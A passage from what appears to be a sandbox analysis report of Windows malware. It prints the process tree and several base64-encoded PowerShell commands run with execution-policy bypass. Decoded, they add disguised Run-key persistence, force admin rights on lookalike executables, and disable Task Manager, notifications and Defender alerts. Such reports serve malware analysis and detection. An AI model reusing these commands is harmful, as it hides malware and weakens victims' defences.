AFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQAbABJAGgAbwBzAHQALgBlAHgAZQAiACwACgAgACAAIAAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIALAAKAAkAIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABTAGgAZQBJAGwARQB4AHAAZQByAGkAZQBuAGMAZQBIAG8AcwB0AC4AZQB4AGUAIgAKACkACgAKAGYAbwByAGUAYQBjAGgAIAAoACQAcABhAHQAaAAgAGkAbgAgACQAYQBwAHAAQwBvAG0AcABhAHQAUABhAHQAaABzACkAIAB7AAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAJABwAGEAdABoACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACQAcABhAHQAaAAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAkAHAAYQB0AGgAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgB9AAoA
        6⤵
        
        PID:6040
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:1152
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcgB1AG4ARQBuAHQAcgBpAGUAcwAgAD0AIABAACgACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgA7ACAAVgBhAGwAdQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUwBoAGUASQBsAEUAeABwAGUAcgBpAGUAbgBjAGUASABvAHMAdAAiADsAIABWAGEAbAB1AGUAPQAiACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAFMAaABlAEkAbABFAHgAcABlAHIAaQBlAG4AYwBlAEgAbwBzAHQALgBlAHgAZQAiAH0ACgApAAoACgBmAG8AcgBlAGEAYwBoACAAKAAkAGUAbgB0AHIAeQAgAGkAbgAgACQAcgB1AG4ARQBuAHQAcgBpAGUAcwApACAAewAKACAAIAAgACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKACAAIAAgACAAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACQAZQBuAHQAcgB5AC4ATgBhAG0AZQAgAC0AVgBhAGwAdQBlACAAJABlAG4AdAByAHkALgBWAGEAbAB1AGUAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAJABlAG4AdAByAHkALgBOAGEAbQBlACAALQBWAGEAbAB1AGUAIAAkAGUAbgB0AHIAeQAuAFYAYQBsAHUAZQAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgB9AAoA
        6⤵
        Adds Run key to start application
        
        PID:5152
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:5560
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAdQBzAGgATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBUAG8AYQBzAHQARQBuAGEAYgBsAGUAZAAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADAAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAdQBzAGgATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBUAG8AYQBzAHQARQBuAGEAYgBsAGUAZAAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAwACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAHUAcwBoAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIAVABvAGEAcwB0AEUAbgBhAGIAbABlAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMAAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcACIAIAAtAE4AYQBtAGUAIAAiAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEcAcgBhAHAAaABpAGMAcwBEAHIAaQB2AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiAEgAdwBTAGMAaABNAG8AZABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAZQAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzACIAIAAtAE4AYQBtAGUAIAAiAFMAeQBzAHQAZQBtACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwBcAFMAeQBzAHQAZQBtACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUAVABhAHMAawBNAGcAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFAAbwBsAGkAYwBpAGUAcwAiACAALQBOAGEAbQBlACAAIgBTAHkAcwB0AGUAbQAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABQAG8AbABpAGMAaQBlAHMAXABTAHkAcwB0AGUAbQAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAFQAYQBzAGsATQBnAHIAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMQAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAiACAALQBOAGEAbQBlACAAIgBFAHgAcABsAG8AcgBlAHIAIgAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUABvAGwAaQBjAGkAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwARQB4AHAAbABvAHIAZQByACIAIAAtAE4AYQBtAGUAIAAiAEQAaQBzAGEAYgBsAGUATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AQwBlAG4AdABlAHIAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAEQAVwBvAHIAZAAiACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABFAHgAcABsAG8AcgBlAHIAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBDAGUAbgB0AGUAcgAiACAALQBUAHkAcABlACAARABXAG8AcgBkACAALQBWAGEAbAB1AGUAIAAxACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBFAG4AaABhAG4AYwBlAGQATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAEUAbgBoAGEAbgBjAGUAZABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAARABlAGYAZQBuAGQAZQByACAAUwBlAGMAdQByAGkAdAB5ACAAQwBlAG4AdABlAHIAIgAgAC0ATgBhAG0AZQAgACIATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgBcAE4AbwB0AGkAZgBpAGMAYQB0AGkAbwBuAHMAIgAgAC0ATgBhAG0AZQAgACIARABpAHMAYQBiAGwAZQBFAG4AaABhAG4AYwBlAGQATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgACIARABXAG8AcgBkACIAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgAgAFMAZQBjAHUAcgBpAHQAeQAgAEMAZQBuAHQAZQByAFwATgBvAHQAaQBmAGkAYwBhAHQAaQBvAG4AcwAiACAALQBOAGEAbQBlACAAIgBEAGkAcwBhAGIAbABlAEUAbgBoAGEAbgBjAGUAZABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAFQAeQBwAGUAIABEAFcAbwByAGQAIAAtAFYAYQBsAHUAZQAgADEAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAIABTAGUAYwB1AHIAaQB0AHkAIABDAGUAbgB0AGUAcgAiACAALQBOAGEAbQBlACAAIgBOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzACIAIAAtAEYAbwByAGMAZQAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8